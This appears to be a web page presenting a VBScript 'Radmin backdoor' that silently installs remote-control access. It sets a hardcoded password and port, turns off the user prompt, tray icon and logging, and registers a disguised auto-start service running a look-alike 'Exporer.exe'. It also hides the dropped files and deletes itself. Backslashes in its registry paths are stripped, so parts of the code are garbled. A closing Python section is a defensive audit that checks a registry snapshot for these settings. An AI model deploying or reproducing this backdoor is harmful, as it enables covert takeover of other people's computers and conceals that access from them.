VBS script implementing the ultimate Radmin backdoor code, with self-deletion

The code is as follows:

onerrorresumenext

constHKEY_LOCAL_MACHINE=&H80000002

strComputer="."

SetStdOut=WScript.StdOut

SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!"&_

strComputer&"rootdefault:StdRegProv")

strKeyPath="SYSTEMRAdmin"

oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath

strKeyPath="SYSTEMRAdminv2.0"

oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath

strKeyPath="SYSTEMRAdminv2.0Server"

oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath

strKeyPath="SYSTEMRAdminv2.0Serveriplist"

oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath

strKeyPath="SYSTEMRAdminv2.0ServerParameters"

oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath

SetobjRegistry=GetObject("Winmgmts:rootdefault:StdRegProv")

strPath="SYSTEMRAdminv2.0ServerParameters"

uBinary=Array(0,0,0,0)

Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary)

uBinary=Array(0,0,0,0)

Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary)

uBinary=Array(1,0,0,0)

Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary)

uBinary=Array(0,0,0,0)

Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary)

uBinary=Array(0,0,0,0)

Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary)

uBinary=Array(0,0,0,0)

Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary)

uBinary=Array(0,0,0,0)

Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary)

uBinary=Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119)// registry export data converted from hexadecimal to decimal; pass:241241241

Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary)// Radmin password

uBinary=Array(5,4,0,0)// port: 1029

Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary)

uBinary=Array(10,0,0,0)

Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary)

SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!"&strComputer&"rootdefault:StdRegProv")

strKeyPath="SYSTEMRAdminv2.0ServerParameters"

strValueName="LogFilePath"

strValue="c:logfile.txt"

setwshshell=createobject("wscript.shell")

a=wshshell.run("sc.execreateWinManageHelpbinpath=%systemroot%system32Exporer.exestart=auto",0)

oReg.SetStringValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue

SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!"&strComputer&"rootdefault:StdRegProv")

strKeyPath="SYSTEMControlSet001ServicesWinManageHelp"

strValueName="Description"

strValue="WindowsMediaPlayerWindowsManagementInstrumentationPlayerDrivers."

oReg.SetStringValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue

strValueName="DisplayName"

strValue="WindowsManagementInstrumentationPlayerDrivers"

oReg.SetStringValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue

strValueName="ImagePath"

strValue="c:windowssystem32Exporer.exe/service"

oReg.SetExpandedStringValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue

setwshshell=createobject("wscript.shell")

a=wshshell.run("netstartWinManageHelp",0)

b=wshshell.run("attrib+r+h+s%systemroot%system32exporer.exe",0)

c=wshshell.run("attrib+r+h+s%systemroot%system32AdmDll.dll",0)

d=wshshell.run("attrib+r+h+s%systemroot%system32raddrv.dll",0)

CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)// self-deletion

The best self-deletion code, which works well:

createobject("scripting.filesystemobject").deletefile(script.scriptname)
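For triage, the settings this script writes can be checked offline against a registry snapshot. The following is an added example, not code from the original page: the snapshot format, the finding labels and the `KNOWN_BINARIES` list are assumptions, and the backslashes in the key paths are restored from the order of the script's `CreateKey` calls.

```python
# Added audit example; key and value names are taken from the script above.
RADMIN_PARAMS = r"SYSTEM\RAdmin\v2.0\Server\Parameters"
SERVICES_ROOT = "SYSTEM\\ControlSet001\\Services\\"
# Assumption: a short list of system binaries whose names droppers imitate.
KNOWN_BINARIES = ("explorer.exe", "svchost.exe", "services.exe", "lsass.exe")

def dword(raw):
    """Decode a 4-byte REG_BINARY value stored as a little-endian DWORD."""
    return int.from_bytes(bytes(raw), "little") if raw is not None and len(raw) == 4 else None

def edit_distance(a, b):
    """Levenshtein distance, used to spot look-alike executable names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def audit(snapshot):
    """Return findings for a {key path: {value name: data}} snapshot of HKLM."""
    findings = []
    params = snapshot.get(RADMIN_PARAMS)
    if params is not None:
        findings.append(f"radmin-server-configured port={dword(params.get('Port'))}")
        if dword(params.get("DisableTrayIcon")) == 1:
            findings.append("tray-icon-hidden")
        if dword(params.get("EnableEventLog")) == 0 and dword(params.get("EnableLogFile")) == 0:
            findings.append("logging-disabled")
        if dword(params.get("FilterIp")) == 0:
            findings.append("ip-filter-off")
    for key, values in snapshot.items():
        if not key.startswith(SERVICES_ROOT):
            continue
        # Image name = last path component, with any "/switch" arguments cut off.
        exe = values.get("ImagePath", "").split("/")[0].strip().rsplit("\\", 1)[-1].lower()
        for real in KNOWN_BINARIES:
            if edit_distance(exe, real) == 1:
                findings.append(f"lookalike-service-image {key[len(SERVICES_ROOT):]} {exe}~{real}")
    return findings

# Constructed snapshot reproducing the values the script writes.
SAMPLE = {
    RADMIN_PARAMS: {"Port": [5, 4, 0, 0], "DisableTrayIcon": [1, 0, 0, 0],
                    "EnableEventLog": [0, 0, 0, 0], "EnableLogFile": [0, 0, 0, 0],
                    "FilterIp": [0, 0, 0, 0]},
    SERVICES_ROOT + "WinManageHelp": {"ImagePath": r"c:\windows\system32\Exporer.exe /service"},
}
```

The `Port` bytes `5,4,0,0` decode to 1029, matching the script's own comment, and the service image name is one edit away from `explorer.exe`.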
